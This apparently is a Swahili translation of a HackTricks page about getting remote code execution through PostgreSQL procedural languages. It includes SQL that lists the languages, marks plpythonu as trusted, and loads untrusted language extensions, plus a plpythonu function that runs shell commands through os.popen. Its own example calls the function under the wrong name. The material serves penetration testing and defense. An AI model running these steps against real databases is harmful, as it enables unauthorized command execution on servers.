RCE with PostgreSQL Languages

Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

Lugha za PostgreSQL

Hifadhidata ya PostgreSQL ambayo umepata ufikiaji inaweza kuwa na lugha za programu zilizosanikishwa ambazo unaweza kuzitumia kwa kutekeleza nambari yoyote.

Unaweza kuzipata zikifanya kazi:

\dL *

SELECT lanname,lanpltrusted,lanacl FROM pg_language;

Wengi wa lugha za skrini unazoweza kusakinisha kwenye PostgreSQL zina aina 2: iliyothaminiwa na isiyothaminiwa. Lugha isiyothaminiwa itakuwa na jina linalomalizika na "u" na itakuwa toleo ambalo litakuruhusu kutekeleza nambari na kutumia kazi nyingine za kuvutia. Hizi ni lugha ambazo zinavutia ikiwa zinasakinishwa:

  • plpythonu

  • plpython3u

  • plperlu

  • pljavaU

  • plrubyu

  • ... (lugha nyingine yoyote ya programu inayotumia toleo lisilo salama)

Ikiwa utagundua kuwa lugha ya kuvutia ime sakinishwa lakini isiyothaminiwa na PostgreSQL (lanpltrusted ni isiyo sahihi), unaweza kujaribu kuithamini na mstari ufuatao ili hakuna vizuizi vitakavyotekelezwa na PostgreSQL:

UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu';
# To check your permissions over the table pg_language
SELECT * FROM information_schema.table_privileges WHERE table_name = 'pg_language';

Ikiwa huoni lugha, unaweza kujaribu kuipakia na (unahitaji kuwa superadmin):

CREATE EXTENSION plpythonu;
CREATE EXTENSION plpython3u;
CREATE EXTENSION plperlu;
CREATE EXTENSION pljavaU;
CREATE EXTENSION plrubyu;

Tafadhali kumbuka kuwa niwezekana kuunda toleo salama kama "lisilo salama". Angalia hii kama mfano. Kwa hivyo, ni vyema kujaribu ikiwa unaweza kutekeleza nambari hata ikiwa unapata tu imewekwa imani.

plpythonu/plpython3u

CREATE OR REPLACE FUNCTION exec (cmd text)
RETURNS VARCHAR(65535) stable
AS $$
import os
return os.popen(cmd).read()
#return os.execve(cmd, ["/usr/lib64/pgsql92/bin/psql"], {})
$$
LANGUAGE 'plpythonu';

SELECT cmd("ls"); #RCE with popen or execve

pgSQL

Angalia ukurasa ufuatao:

pagePL/pgSQL Password Bruteforce

C

Angalia ukurasa ufuatao:

pageRCE with PostgreSQL Extensions
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Last updated